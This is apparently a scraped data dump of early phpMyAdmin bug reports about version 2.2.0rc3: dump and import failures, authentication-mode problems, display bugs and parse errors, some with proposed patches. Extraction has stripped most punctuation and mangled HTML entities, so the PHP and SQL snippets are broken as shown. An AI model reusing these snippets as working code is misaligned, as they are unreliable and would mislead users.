There is an error in left.js at line 206, Error reads as amp;quot;null is not an object amp;quot; See the following segment ========================= else if isIE4) \{ var whichEl = document.all el Child ); var whichIm = document.images.item el Child ); if whichEl.style.display == none ) \{ whichEl.style.display = block ; error amp;gt; whichIm.src = imgOpened.src; \} ========================= Original URL https sourceforge.net p phpmyadmin bugs 48 https sourceforge.net p phpmyadmin bugs 48 Original author anonymous","bug"
"24444","6418","win) insert text files.
Looks like a stripped backslash problem under Windows from the forum ) I am trying to use phpmyadmin win98) to insert a text file in to a table.
It keeps coming up with the error message amp;quot;MySQL said c phpdev2phpphp6004.tmp not found Errcode 2) amp;quot;.
The 6004 part is a different number each time I try.
In the actual sql statement it has created, it has amp;quot;LOAD DATA LOCAL INFILE C \phpdev2\php\php6004.TMP INTO TABLE Financial Year Paid etc amp;quot;.
I have put the text file in to the same directory as the tables What am I doing wrong or what should I do?
Original URL https sourceforge.net p phpmyadmin bugs 49 https sourceforge.net p phpmyadmin bugs 49 Original author lem9","bug"
"24444","6419","Gzipped dumps have wrong extension.
When getting a dump of a database in gzip format phpMyAdmin sends the file as table name.sql instead of as table name.sql.gz as it should.
Adam Original URL https sourceforge.net p phpmyadmin bugs 50 https sourceforge.net p phpmyadmin bugs 50 Original author anonymous","bug"
"24444","6420","Insert as new row empty BLOBs.
When duplicating a record with amp;quot;insert as new row amp;quot; button, blobs fields are emptied.
Original URL https sourceforge.net p phpmyadmin bugs 51 https sourceforge.net p phpmyadmin bugs 51 Original author lem9","bug"
"24444","6421","Headers already sent.
If I just edit the config file and upload them to my webserver I get errors about the Headers already being sent.
To solve this I have to not send the extra Headers located in head.inc.php and left.php Original URL https sourceforge.net p phpmyadmin bugs 52 https sourceforge.net p phpmyadmin bugs 52 Original author anonymous","bug"
"24444","6422","Catching Errors after wrong ALTER.
After doing ALTER TABLE..., where is something wrong in my case it was been default value near blob column) message suggested, that everything was ok and table changes, but there wasn t any change cause bad SQL ALTER query.
Original URL https sourceforge.net p phpmyadmin bugs 53 https sourceforge.net p phpmyadmin bugs 53 Original author mizydors Found in version 2.3.0 rc3","bug"
"24444","6423","Error in file user details.php3.
Error Warning Variable used in global statement already exists in the function in home httpd html phpmyadmin user details.php3 on line 57X x beacuse we added some lines) Solution Edit these lines global strDelPassMessage, strRememberReload, strUpdatePassMessage; global strUpdatePrivMessage, strRememberReload; vinay sanisoft.com girish sanisoft.com Original URL https sourceforge.net p phpmyadmin bugs 54 https sourceforge.net p phpmyadmin bugs 54 Original author anonymous","bug"
"24444","6424","Javascript error in user details.php3.
Error amp;quot;MYSQL MAJOR VERSION amp;quot; is undefined Line 87 Solution Add require amp;quot;.
lib.inc.php3 amp;quot;); at the begining vinay sanisoft.com girish sanisoft.com Original URL https sourceforge.net p phpmyadmin bugs 55 https sourceforge.net p phpmyadmin bugs 55 Original author anonymous","bug"
"24444","6425","Can t add a new MySQL user.
When I try to add a new record to the user table under the mysql database so a new user can have access to their own database, the first 3 fields are not editable Host char 60) binary Binary Binary do not edit User char 16) binary Binary Binary do not edit Password char 16) binary Binary Binary do not edit How can I go in and add a new user to the user table?
Even editing won t work.
Thanks, Tim Original URL https sourceforge.net p phpmyadmin bugs 56 https sourceforge.net p phpmyadmin bugs 56 Original author anonymous Found in version 2.3.0 rc3","bug"
"24444","6426","spanish langage.
hi!
i am a french man and when i select the spanish language there is a parse error at lign 91 or 92.
bye!!
good luck for the project phpmyadmin Original URL https sourceforge.net p phpmyadmin bugs 57 https sourceforge.net p phpmyadmin bugs 57 Original author anonymous","bug"
"24444","6427","Select problem.
I use Browse on a table and insert a new row with amp;quot;Insert new row amp;quot; link.
After insert, the next page display all records of the table, the rows limitation doesn t work.
I have also noticed that after inserting, the select query on top of page begins by blanc lines.
For instance here is the browse query SQL query SELECT FROM tblLanguage LIMIT 0, 30 I insert a new row.
here is the next query display SQL query SELECT FROM tblLanguage LIMIT 0, 30 If I insert other rows, the number of blanc lines increases.
Thanks for your help.
Laurent Original URL https sourceforge.net p phpmyadmin bugs 58 https sourceforge.net p phpmyadmin bugs 58 Original author lchastel","bug"
"24444","6428","Browse Edit bug.
Hi, I ve found a new ?)
bug 1) Browse a table 2) Click on the amp;quot;Edit amp;quot; link for any row 3) Click on amp;quot;Save amp;quot; Then you come back to the row view but without any limit amp;quot;SQL Query SELECT FROM tbl amp;quot; rather than amp;quot;...FROM tbl LIMIT... amp;quot;) !
So the table will be displayed entirely !
Original URL https sourceforge.net p phpmyadmin bugs 59 https sourceforge.net p phpmyadmin bugs 59 Original author hparissi","bug"
"24444","6429","Checking version of MySQL fails....
I m getting the following errors Running MySQL 3.23.39 PHP4.0.6 phpMyAdmin 2.2.0rc2 on Debian) when first firing up phpMyAdmin Warning Access denied for user www data localhost Using password NO) in web home php mysql defines.inc.php on line 29 Warning MySQL Connection Failed Access denied for user www data localhost Using password NO) in web home php mysql defines.inc.php on line 29 Warning MySQL A link to the server could not be established in web home php mysql defines.inc.php on line 29 Error MySQL said Access denied for user www data localhost Using password NO) when I comment out the following lines, things work fine although I don t know the version ) result = mysql query amp;quot;SELECT VERSION ) AS version amp;quot;) or mysql die ); row = mysql fetch array result); define amp;quot;MYSQL MAJOR VERSION amp;quot;, double)substr row [ amp;quot;version amp;quot;], 0, 4)); define amp;quot;MYSQL MINOR VERSION amp;quot;, double)substr row [ amp;quot;version amp;quot;], 5)); Original URL https sourceforge.net p phpmyadmin bugs 60 https sourceforge.net p phpmyadmin bugs 60 Original author anonymous","bug"
"24444","6430","connection error select other dbs.
I m using 2.2.0rc2 When the primary db is not running i even can t select the second or third db, because only a error msg is displayed, that Warning MySQL Connection Failed Can t connect to local MySQL server through socket var lib mysql mysql.sock 2) in home hernst html phpmyadmin lib.inc.php on line 30 the local db on my laptop) is not running at the moment, because it is only needed sometimes.
I use phpmyadmin to admin some other mysql db via my laptop running on different locations and networks.
So using another db as primary will not be posssible I have no db to which I can connect everytime and from everywhere Original URL https sourceforge.net p phpmyadmin bugs 61 https sourceforge.net p phpmyadmin bugs 61 Original author hernst","bug"
"24444","6431","RC3)Edit record with two similar SET fields.
A bug which has not been fixed in 2.2 yet).
For example.
In a table I have some fields.
Two of them are SET fields.
One with the options amp;quot;hello amp;quot;, amp;quot;goodbye amp;quot;, amp;quot;foo amp;quot; and amp;quot;bar amp;quot; and the other one with the options amp;quot;hello amp;quot;, amp;quot;foo amp;quot; and amp;quot;peter amp;quot;.
If I then add a new record to the table, where I choose amp;quot;goodbye amp;quot; and amp;quot;foo amp;quot; from the first SET and amp;quot;hello amp;quot; and amp;quot;peter amp;quot; from the other.
This works fine.
But then I might want to edit the record.
Then all the chosen in the SET will also be chosen in the other SET too in my example the options amp;quot;hello amp;quot; and amp;quot;foo amp;quot; will be chosen in both of the SETs, which was not what I wanted).
Because of this I have to unmark those options everytime I edit the record.
Original URL https sourceforge.net p phpmyadmin bugs 62 https sourceforge.net p phpmyadmin bugs 62 Original author anonymous","bug"
"24444","6432","size error with merged tables.
table records size master 643 839 23,7 Mo masterarchive 13 554 947 452,1 Mo masterglobal 14 198 786 244,6 Mo master and masterarchive are merged in a table named masterglobal.
as you can see, the records numbers are ok 643 839 13 554 947 = 14 198 786 but it seems the size is wrong Original URL https sourceforge.net p phpmyadmin bugs 63 https sourceforge.net p phpmyadmin bugs 63 Original author anonymous","bug"
"24444","6433","Parse Error in spanish.inc.php.
There is an extra character on the end of the line 92 of lang spanish.inc.php Original URL https sourceforge.net p phpmyadmin bugs 64 https sourceforge.net p phpmyadmin bugs 64 Original author anonymous","bug"
"24444","6434","Error en el arxivo spanish.inc.
Cuando se ejecuta el lenguaje Espaxc5x84ol, el navegador imprime error.
Para solventarlo simplemente se tiene que acceder al directorio donde se encuentra el arxivo spanish.inc la ruta es ... phpmyadmin lang spanish.inc abrirlo y buscar la linea 91 o buscar la variable amp;quot; strEffective = amp;quot;Efectivo a amp;quot;; e amp;quot; y suprimir la amp;quot;e amp;quot; despues del punto y coma.
o bien descargar el arxivo modificado y reemplazarlo.
Espero pueda ayudar.
Gracias Original URL https sourceforge.net p phpmyadmin bugs 65 https sourceforge.net p phpmyadmin bugs 65 Original author anonymous","bug"
"24444","6435","Error importing dump from MySQL 3.23.
As I have figured out the problem is that if MySQL 3.23 is present phpmyadmin uses amp;quot;SHOW CREATE TABLE amp;quot; to get the table create in get table def in lib.inc.php3.
Why?
The problem is that the returned structure is like CREATE TABLE accessstat bereich varchar 50) NOT NULL default , counter bigint 20) NOT NULL default 1 ) TYPE=MyISAM; But when I try to import it to MySQL 3.22 this query crashes because of the amp;quot; amp;quot; around accessstat, bereich and counter.
If I manipulate tablename and columnnames to CREATE TABLE accessstat bereich varchar 50) NOT NULL default , counter bigint 20) NOT NULL default 1 ) TYPE=MyISAM; Everything works fine!
Hmm, is this amp;quot;show create table amp;quot; in MySQL 3.23 not backward compatible?
What if you use the same functions in get table def as we use for MySQL 3.22?
In the source 3.23 is a special case because this seems to be the version when the show create feature was introduced.
If I change the source to e.g.
== amp;quot;3.24 amp;quot; or something I surely get the amp;quot;usual amp;quot; table dump that is also backward compatible.
Any comments?
Who wrote the get table def routines for 3.23?!?
Requesting your comments Stefan Original URL https sourceforge.net p phpmyadmin bugs 66 https sourceforge.net p phpmyadmin bugs 66 Original author anonymous","bug"
"24444","6436","Undefined variable ob mode.
After a problem for example an illegal ALTER TABLE), and because of the new code for HTTP compression Undefined variable ob mode in ... footer.inc.php3 on line 15 Original URL https sourceforge.net p phpmyadmin bugs 67 https sourceforge.net p phpmyadmin bugs 67 Original author lem9","bug"
"24444","6437","Unable to quot;Insert textfile into table quot;.
Uploading from WinME Win98 PC to phpMyAdmin rc3 and rc2) on Linux 7.0.
Advanced Authentication Mode Upload initially gives amp;quot;No Database Selected amp;quot; sql.php was found to have a leading space in db I added a trim db) at the top of sql.php amp;quot; require amp;quot;.
grab globals.inc.php amp;quot;); require amp;quot;.
lib.inc.php amp;quot;); BillT db=trim db); if isset goto) amp;amp; amp;amp; goto == amp;quot;sql.php amp;quot;) amp;quot; The message changed to MySQL said Field separator argument is not what is expected.
Check the manual amp;quot; I did some debugging and am pretty sure that the separator charactor also has a leading space, but isn t so easy to debug.
In addition, the uploaded text file abc.txt) looks like this tmp catphp waits for a php file and cats it ) tmp catphp Content Type text plain amp;quot;abc amp;quot; amp;quot;def amp;quot; amp;quot;sjhdg amp;quot; amp;quot;wer amp;quot; Original URL https sourceforge.net p phpmyadmin bugs 68 https sourceforge.net p phpmyadmin bugs 68 Original author anonymous","bug"
"24444","6438","Wrong link for quot;edit delete row quot;.
If you have a table without a key, and you want to edit delete a row in this table with some html special chars like amp;lt;, amp;gt;, amp;amp; etc.
in some of the table fields, the link for edit is wrong.
This is caused by an unnecessary htmlspecialchars ) in lib.inc.php 3) line 442 in rc3).
Original URL https sourceforge.net p phpmyadmin bugs 69 https sourceforge.net p phpmyadmin bugs 69 Original author anonymous","bug"
"24444","6439","error copying data and structure.
Warning Missing argument 5 for get table content ) in home www maat phpMyAdmin 2.2.0rc3 php lib.inc.php on line 626 Fatal error Call to undefined function ) in home www maat phpMyAdmin 2.2.0rc3 php lib.inc.php on line 723 Received these two error messages on a new installation at icestorm.com running php4 and hitting MySQL, version unknown.
The tables involved are the four standard Phorum 3.3 database tables.
I was attempting to copy both data and structure of a table.
The attempt resulted in an empty table being created.
I was subsequently able to successfully copy the structure only.
I repeated this process on several more tables with the same result, the table structure was copied but the data was not appended into the new table.
I am otherwise able to access the tables using Original URL https sourceforge.net p phpmyadmin bugs 70 https sourceforge.net p phpmyadmin bugs 70 Original author anonymous","bug"
"24444","6440","Create New Database option.
Hi, I believe there is a small problem with phpMyAdmin 2.2.0rc3 while in Advanced Authentication mode main.php always shows the amp;quot;Create new database amp;quot; option even if the currently logged in user does not have privs to create a database.
In Advanced mode, the amp;quot;stduser amp;quot; from config.inc.php can only select tables in the amp;quot;mysql amp;quot; database, so the code in this if statement line 143 of main.php) always executes if !mysql select db row[ Db ])) \{ db to create = row[ Db ]; create=true; break; \} and therefore the user is always shown the amp;quot;create new database amp;quot; option.
In order for this check to work correctly, it must try the amp;quot;mysql select db amp;quot; command using the currently logged in username and password, not the amp;quot;stduser amp;quot; from config.inc.php hope this helps, larry Original URL https sourceforge.net p phpmyadmin bugs 71 https sourceforge.net p phpmyadmin bugs 71 Original author ljm","bug"
"24444","6441","Some Bin.
fields should be editable.
Version phpMyAdmin 2.2.0rc3 It appears that binary fields are not editable.
The field type of the columns in question are CHAR and INT.
They have the amp;quot;BINARY amp;quot; attribute because they are user pass fields and positive integer fields respectively.
I see from the code that you don t want users to edit binary data which is fair enough but the issue seems to be a bit confused with regards to the BINARY attribute and ASCII data.
Original URL https sourceforge.net p phpmyadmin bugs 72 https sourceforge.net p phpmyadmin bugs 72 Original author anonymous","bug"
"24444","6442","include path, open basedir.
Some ISP s are using open basedir or include path PHP directives, so users have problems with the .
at the beginning of paths with the .
lang for languages Could we help users of those ISP s?
Original URL https sourceforge.net p phpmyadmin bugs 73 https sourceforge.net p phpmyadmin bugs 73 Original author lem9","bug"
"24444","6443","SHOW PROCESSLIST.
in line 385 in lib.inc.php if sql query == amp;quot;SHOW PROCESSLIST amp;quot;) \{ This condition is not correct if I try any of this queries show processlist SHOW PROCESSLIST I propouse to change it to if eregi amp;quot; [ \n\r] show[ \n\r] processlist[ \n\r] amp;quot;, sql query)) \{ With best regards Original URL https sourceforge.net p phpmyadmin bugs 74 https sourceforge.net p phpmyadmin bugs 74 Original author anonymous","bug"
"24444","6444","not null appearing as default null.
When I do a dump on some of my forums, I can t figure out exactly when, everything is fine except that it outputs default on a column where it should be not the following is an example phpMyAdmin MySQL Dump version 2.2.0rc3 http phpwizard.net phpMyAdmin http phpmyadmin.sourceforge.net download page) Host localhost Generation Time July 24, 2001, 5 41 pm Server version 3.23.22 PHP Version 4.0.5 Database car Table structure for table car year DROP TABLE IF EXISTS car year; create table car year year id tinyint 3) default NULL auto increment,year int 4) not null default 0 ,primary key year id)) type=MyISAM; Original URL https sourceforge.net p phpmyadmin bugs 75 https sourceforge.net p phpmyadmin bugs 75 Original author anonymous Found in version 3.3.7","bug"
"24444","6445","Advanced authentication issue.
When you want advanced auth, and, don t have access to the mysql database, you simply cannot use phpmyadmin.
Why advanced auth tries to access it and basic does not ?
Also, advanced auth could be used in another form, using login pass from stduser stdpass, but, if user password were set, they would be used instead.
solves many problems with db passwords you can t remember hehe) Original URL https sourceforge.net p phpmyadmin bugs 76 https sourceforge.net p phpmyadmin bugs 76 Original author anonymous","bug"
"24444","6446","2.2.0) problem in uploaded file.
I exported a file from phpMyAdmin 2.0.5 that among other things, has alot of strings like this string text between sounds, followed by a carriage return.
I used the execute query in text file option of the latest phpMyAdmin and these strings are removed somehow.
They are definitely in the sql file sent to me by the other version of phpMyAdmin, and when I do a cat tablename.sql | mysql uroot p dbname it works just fine.
Thanks for the great work!
Tom Original URL https sourceforge.net p phpmyadmin bugs 77 https sourceforge.net p phpmyadmin bugs 77 Original author anonymous Found in version 2.2.0","bug"
"24444","6447","2.2.0) Data Missing POST Error.
In phpMyAdmin 2.2.0rc3, whenever an error exists in the create alter SQL statements e.g., bad field name) and Back is hit, a POST expiry error results.
phpMyAdmin 2.1.0 has been verified not to exhibit this behaviour.
Original URL https sourceforge.net p phpmyadmin bugs 78 https sourceforge.net p phpmyadmin bugs 78 Original author ivazquezabrams","bug"
"24444","6448","Various backslash problems.
When ALTERing a SET or ENUM and other types?)
field, any backslashes as members are displayed as singles instead of conveniently being displayed as doubles.
Also, while SETs can take a double backslash as they should), ENUMs seem to require a quadruple backslash instead.
I just did some quick non backslash related tests, so I haven t tried all field types with backslashes or single or double quotes.
Original URL https sourceforge.net p phpmyadmin bugs 79 https sourceforge.net p phpmyadmin bugs 79 Original author ivazquezabrams","bug"
"24444","6449","preg replace not available.
Some ISP s don t offer this function in their PHP installation.
A user suggests to use ereg replace instead.
Original URL https sourceforge.net p phpmyadmin bugs 80 https sourceforge.net p phpmyadmin bugs 80 Original author lem9","bug"
"24444","6450","2.2.0) Other cases for display=simple.
Use display=simple also when a query like this one select count ) from sometable Original URL https sourceforge.net p phpmyadmin bugs 82 https sourceforge.net p phpmyadmin bugs 82 Original author lem9","bug"
"24444","6451","RC3)SQL DATE amp;amp; TIME FUNCTION ERROR.
OCCUR ERROR select WEEK 2001 08 02 ) select DAYOFMONTH 2001 08 02 ) select DAYOFWEEK 2001 08 02 ) .
.
.
.
.
.
Original URL https sourceforge.net p phpmyadmin bugs 81 https sourceforge.net p phpmyadmin bugs 81 Original author anonymous","bug"
"24444","6452","Create table with no field.
Ask to create a table with say) 2 fields.
Then press Save on the next panel.
Original URL https sourceforge.net p phpmyadmin bugs 83 https sourceforge.net p phpmyadmin bugs 83 Original author lem9","bug"
"24444","6453","advanced auth.
phpMyAdmin 2.2.X issue.
I was using phpMyAdmin 2.1.0 and I decided to upgrade to version 2.2.0rc3.
All were running ine with basic authentification, but when I decided to turn on advanced authentification phpMyAdmin replied amp;quot;Erreur MySQL a rxc3xa9pondu No Database Selected Retour amp;quot; The fields cfgServers[1][ stduser ] and cfgServers[1][ stdpass ] where correctly filled with a user password that can read the amp;quot;user amp;quot; database.
This was correctly running under phpMyAdmin 2.1.0 but not with 2.2.0rc\{1,2,3\}.
PHP is running as an Apache module.
Versions PHP 4.0.6 Apache 1.3.20 mysql 9.15 Distrib 3.21.30 Has anybody an idea ?
Original URL https sourceforge.net p phpmyadmin bugs 84 https sourceforge.net p phpmyadmin bugs 84 Original author farinas","bug"
"24444","6454","RC3)Output buffering bug and fix.
IF a user sets the output handler in php.ini to ob gzhandler, then any right frame file in phpMyAdmin will not be handled properly by the browser.
My fix was to check the ini file within the out buffer mode get ) function.
After this if function exists ob start )) mode = 1; else mode = 0; Add this if ini get output handler) == amp;quot;ob gzhandler amp;quot;) mode = 0; This will disable the output buffering in phpmyadmin and will let php handle it all internally.
Garth Gillespie Original URL https sourceforge.net p phpmyadmin bugs 85 https sourceforge.net p phpmyadmin bugs 85 Original author anonymous","bug"
"24444","6455","RC3) 2.2rc3 ui bug.
In 2.2rc3 when the user does not have rights to look at the users table the main page rh frame still has the Users option.
Then when the user selects it the response is Error MySQL said You don t have enough rights to be here right now!
???
Original URL https sourceforge.net p phpmyadmin bugs 86 https sourceforge.net p phpmyadmin bugs 86 Original author anonymous","bug"
"24444","6456","insert new fields with defaults.
example insert a int field to table test fieldname id2 type int default 0 phpMyAdmin 2.2.0rc3) create alter table add id2 default this is not correct!
Original URL https sourceforge.net p phpmyadmin bugs 87 https sourceforge.net p phpmyadmin bugs 87 Original author anonymous","bug"
"24444","6457","RC3) Enum not providing selectbox on insert.
Hi, When using multiple?)
enum fields in a table, at least the first one, doesn t give me a selectbox, when I want to insert data.
Attached is the tabledump.
The media type gives me a textarea, like it is a textfield.
Original URL https sourceforge.net p phpmyadmin bugs 88 https sourceforge.net p phpmyadmin bugs 88 Original author nyvlem","bug"
"24444","6458","3 bugs.
1\.
trying to do a database dump to file, the script hangs.
Same for when you re just trying to view data dump on a large table.
This works fine in V2.05 ...
I am able to do a CSV dump of a table but not a whole .sql file dump of a database.
2\.
if you browse a table, then click a header to sort on that field ... then do an edit submit ... upon returning to the table view, the records are no longer sorted as they were previously.
This acted correctly in V2.05, but is not reacting like that now.
3\.
Some mySQL errors are not being reported following the amp;quot;mysql said amp;quot; message.
If the same query is tried in V2.05, the proper error message is reported.
Doesn t affect anything but you are simply unable to tell what the error was.
Original URL https sourceforge.net p phpmyadmin bugs 89 https sourceforge.net p phpmyadmin bugs 89 Original author anonymous","bug"
"24444","6459","Opera 5.0 Linux Add user bug.
Hi, See amp;lt;a href= amp;quot;http phpwizard.net phorum read.php?f=1 amp;amp;i=4395 amp;amp;t=4395 amp;quot; amp;gt;my post on the phpWizard.net forum amp;lt; a amp;gt; for details basically, adding a user with amp;quot;Home amp;gt; Users amp;gt; Add new user amp;quot; doesn t work with Opera 5.0 Linux due to what looks like a bug in Opera s JavaScript implementation.
The amp;lt;code amp;gt;for var property in f) amp;lt; code amp;gt; loop in amp;lt;code amp;gt;privToString ) amp;lt; code amp;gt; never gets executed, and some tests I did seem to confirm that Opera can t handle amp;lt;code amp;gt;for x in y) amp;lt; code amp;gt; style loops at all.
A patch to fix this plus a couple of other small bugs I came across in amp;lt;code amp;gt;user details.php amp;lt; code amp;gt;) is included I just rewrote the amp;lt;code amp;gt;for in amp;lt; code amp;gt; loop to a amp;quot;normal amp;quot; amp;lt;code amp;gt;for amp;lt; code amp;gt; loop).
HTH amp;amp; thanks for a great tool, Thomas Original URL https sourceforge.net p phpmyadmin bugs 90 https sourceforge.net p phpmyadmin bugs 90 Original author zlatk0","bug"
"24444","6460","Fieldname changes when editing record.
When I look up an item in one of my tables and try to edit it there is a field named amp;quot;style amp;quot;.
But when I try to commit the changes the field is renamed in the update query to Ttyle and I get this error.
MySQL said Unknown column Ttyle in field list my work around is to copy the sql and paste it into the amp;quot;run SQL query ... amp;quot; text area and rename the field back to style Does anyone know how to fix this?
Thanks, Andy Cottrell Original URL https sourceforge.net p phpmyadmin bugs 91 https sourceforge.net p phpmyadmin bugs 91 Original author anonymous","bug"
"24444","6461","bug with ) in text when doing read dump.
using v2.2.0rc3 in one of my tables i have the following content ... amp;lt;a href=\ amp;quot;javascript ;\ amp;quot; onClick=\ amp;quot;openBrWindow \ images hardware matrox curl l.jpg\ ,\ 3dflex\ ,\ wid th=420,height=300\ )\ amp;quot; amp;gt; amp;lt;img src=\ amp;quot;images hardware matrox curl s.jpg\ amp;quot; width=\ amp;quot;130 \ amp;quot; height=\ amp;quot;87\ amp;quot; border=\ amp;quot;0\ amp;quot; alt=\ amp;quot;Page Curl Effekt\ amp;quot; amp;gt; amp;lt; a amp;gt;... when I dump my db the line reads INSERT INTO page content VALUES 55,1, , amp;lt;p align=\ amp;quot;justify\ amp;quot; amp;gt;... amp;lt;a href=\ amp;quot;javascript ;\ amp;quot; onClick=\ amp;quot;openBrWindow \ images hardware matrox curl l.jpg\ ,\ 3dflex\ ,\ wid th=420,height=300\ )\ amp;quot; amp;gt; amp;lt;img src=\ amp;quot;images hardware matrox curl s.jpg\ amp;quot; width=\ amp;quot;130 \ amp;quot; height=\ amp;quot;87\ amp;quot; border=\ amp;quot;0\ amp;quot; alt=\ amp;quot;Page Curl Effekt\ amp;quot; amp;gt; amp;lt; a amp;gt;... , none , ,1, , ); So far so good.
When I now read dump.php this dump it will spit out an error message [SQL error near amp;quot;] If I remove the javascript part it will read the dump ok, so I guess the \ are the problem?
I just don t know how since they are properly escaped with \ Original URL https sourceforge.net p phpmyadmin bugs 92 https sourceforge.net p phpmyadmin bugs 92 Original author ihad","bug"
"24444","6462","RC3) edit binary char fields.
I can t edit a binary blob text field.
It s Ok because it s contents may be a graphic, a file, a song... but a binay char field its a simple char field with the binary atributte to make it case sensitive.
Original URL https sourceforge.net p phpmyadmin bugs 93 https sourceforge.net p phpmyadmin bugs 93 Original author anonymous","bug"
"24444","6463","dump causes 100 CPU utilization rc3).
Making a dump of a 4MB table 45000) records causes php.exe to cause 100 CPU utilization.
Even after minutes of waiting the dump does not show up.
The dump is made with the options Structure and data send If 2.1.0 is used instead of 2.2.0rc3 then it works without any problems.
I guess an extra operation sorting?)
is performed causing this performance degrade.
Original URL https sourceforge.net p phpmyadmin bugs 94 https sourceforge.net p phpmyadmin bugs 94 Original author rukapul","bug"
"24444","6464","RC3) bug in enum display.
I had setup an ENUM field like so M,,, , ,L,, , ,,XL, , ,,,XXL , M,L,, , M,L,XL .... and the ENUM dropdown to add edit showed me several blank options and a couple of partially filled in options.
I checked in mysql command line and the enum showed up fine.
I checked in v2.1.0 and it showed up fine as well.
Original URL https sourceforge.net p phpmyadmin bugs 95 https sourceforge.net p phpmyadmin bugs 95 Original author anonymous","bug"
"24444","6465","Dump files ignored with Windows server.
The filename sanity check for dumps fails to recognize valid paths when running Windows as a server if sql file != amp;quot;none amp;quot;) \{ do file upload if ereg amp;quot; php[0 9A Za z . ]
amp;quot;, basename sql file))) \{ sql query = fread fopen sql file, amp;quot;r amp;quot;), filesize sql file)); if get magic quotes runtime ) == 1) sql query = stripslashes sql query); \} \} Commenting out the ereg line makes dumps work fine.
Original URL https sourceforge.net p phpmyadmin bugs 96 https sourceforge.net p phpmyadmin bugs 96 Original author wvenable","bug"
"24444","6466","RC3) blob appears as binary.
column header with type set as blob and undeclared attribute appears as binary function when editing.
value hidden and displays Binary do not edit .
Original URL https sourceforge.net p phpmyadmin bugs 97 https sourceforge.net p phpmyadmin bugs 97 Original author anonymous","bug"
"24444","6467","Dumps containing binary data not working.
PhpMyAdmin 2.2.0rc3 An error in the split sql file causes it to split up the SQL statements incorrectly when dealing with binary records probably those contain alot of escaped and amp;quot;) The following change in split sql file fixes the problem function split sql file sql, delimiter) \{ sql = trim sql); char = amp;quot; amp;quot;; last char = amp;quot; amp;quot;; ret = array ); in string = false; changed to false from true for i=0; i amp;lt;strlen sql); i ) \{ char = sql[ i]; if delimiter found, add the parsed part to the returned array if char == delimiter amp;amp; amp;amp; !
in string) \{ ret[] = substr sql, 0, i); sql = substr sql, i 1); i = 0; last char = amp;quot; amp;quot;; \} if !
in string amp;amp; amp;amp; char == amp;quot;\ amp;quot; amp;quot; || char == amp;quot; amp;quot;) amp;amp; amp;amp; last char != amp;quot;\\ amp;quot;)) in string = char; elseif char == in string amp;amp; amp;amp; last char !
= amp;quot;\\ amp;quot;) in string = false; if last char == in string amp;amp; amp;amp; char == amp;quot;) amp;quot;) in string = false; if char == in string amp;amp; amp;amp; last char != amp;quot;\\ amp;quot;) in string = false; elseif !
in string amp;amp; amp;amp; char == amp;quot;\ amp;quot; amp;quot; || char == amp;quot; amp;quot;) amp;amp; amp;amp; last char != amp;quot;\\ amp;quot;)) in string = char; last char = char; \} if !empty sql)) ret[] = sql; return ret); \} Original URL https sourceforge.net p phpmyadmin bugs 98 https sourceforge.net p phpmyadmin bugs 98 Original author wvenable","bug"
"24444","6468","typos in documentation.html.
Hardly worth mentioning, but here goes ) In Documentation.html v 1.36, there are a few small errors 1) in the FAQ amp;quot;I would like to help out with the development of phpMyAdmin... amp;quot; the answer says amp;quot;Also, have a look at the file DEVELOPERS amp;quot;, but according to the changelog that file was removed on 8 2 2) in the FAQ amp;quot;How can I insert a null value into my table?
amp;quot; the answer says amp;quot;Timestamp ot AutoIncrement fields amp;quot;, probably should be amp;quot;or amp;quot; not amp;quot;ot amp;quot; 3) in the FAQ amp;quot;I m having troubles when uploading files... amp;quot; the answer says amp;quot;the problem is that this packaged has a serious bug amp;quot;, probably should be amp;quot;package amp;quot; not amp;quot;packaged amp;quot; Original URL https sourceforge.net p phpmyadmin bugs 99 https sourceforge.net p phpmyadmin bugs 99 Original author ljm","bug"
"24444","6469","Databases names after Drop Database.
Hi, I have been testing advanced authentication.
When I setup a user with access to one database, login as the user and drop that database a list of all the databases owned by the standard user shows up.
This isn t really a great problem as the user does not have rights on the database and the standard user only has rights on the mysql database.
Just wanted to point that out.
Damn good job on the new version btw.
Original URL https sourceforge.net p phpmyadmin bugs 100 https sourceforge.net p phpmyadmin bugs 100 Original author anonymous","bug"
"24444","6470","RC3) Bad counting of entries.
In sql.php3 for a query ending with amp;quot;order by amp;quot; like this one select left CALLSIGN,2) as X from TESTRC4 order by X an illegal query is generated for counting the entries SELECT COUNT ) AS count FROM TESTRC4 order by X and eventually, SelectNumRows is not set.
Thanks to Laurent Haas for building a test case for this!
Original URL https sourceforge.net p phpmyadmin bugs 101 https sourceforge.net p phpmyadmin bugs 101 Original author lem9","bug"
"24444","6471","Redirect fails PHP4.0.6 ISAPI bug).
phpMyAdmin is affected by a php redirection bug reported some time ago http bugs.php.net ?id=12529 amp;amp;edit=1 This happens e.g.
when I edit a table field content.
The table update is done correctly but the redirection can fail with no data returned from the server.
Regards Olafur opj30 hotmail.com Original URL https sourceforge.net p phpmyadmin bugs 102 https sourceforge.net p phpmyadmin bugs 102 Original author anonymous","bug"
"24444","6472","phpmain Frame in Opera 5.12.
The phpmain Frame viewed in Oper 5.12 shows allways all databases with all tables.
There is no chance to click on plus to hide the tables of a database.
Original URL https sourceforge.net p phpmyadmin bugs 103 https sourceforge.net p phpmyadmin bugs 103 Original author anonymous","bug"
"24444","6473","Support of table aliases.
Those are valid SQL select from thetable tn select from thetable as tn and are useful when coding complicated joins.
Try this on a table that needs more than one page to display, then press the Next button an error will be generated.
Original URL https sourceforge.net p phpmyadmin bugs 104 https sourceforge.net p phpmyadmin bugs 104 Original author lem9","bug"
"24444","6474","Compressed dump hangs.
A user is trying to dump a database to file send), or to view a dump of a large table.
However a .csv dump works, but not a .sql dump.
Original URL https sourceforge.net p phpmyadmin bugs 105 https sourceforge.net p phpmyadmin bugs 105 Original author lem9","bug"
"24444","6475","RC3) Maintain sql order after edit.
Browse a table.
Click a header to sort on this field.
Edit a row.
When back on the table view, the table is no longer shown in the order asked.
Original URL https sourceforge.net p phpmyadmin bugs 106 https sourceforge.net p phpmyadmin bugs 106 Original author lem9","bug"
"24444","6476","RC3) Missing MySQL error messages.
For example SELECT first,last,alma mater,ID as coachID FROM coaches,mcoachYxY WHERE school ID=66 ... etc ... phpmyadmin v2.0.5 returns MySQL said Column ID in field list is ambiguous phpmyadmin 2.2.0 returns MySQL said Original URL https sourceforge.net p phpmyadmin bugs 107 https sourceforge.net p phpmyadmin bugs 107 Original author lem9","bug"
"24444","6477","Insert Data Error on Win32 Server.
phpMyAdmin 2.2.0rc4 latest CVS from today 22 00) included.
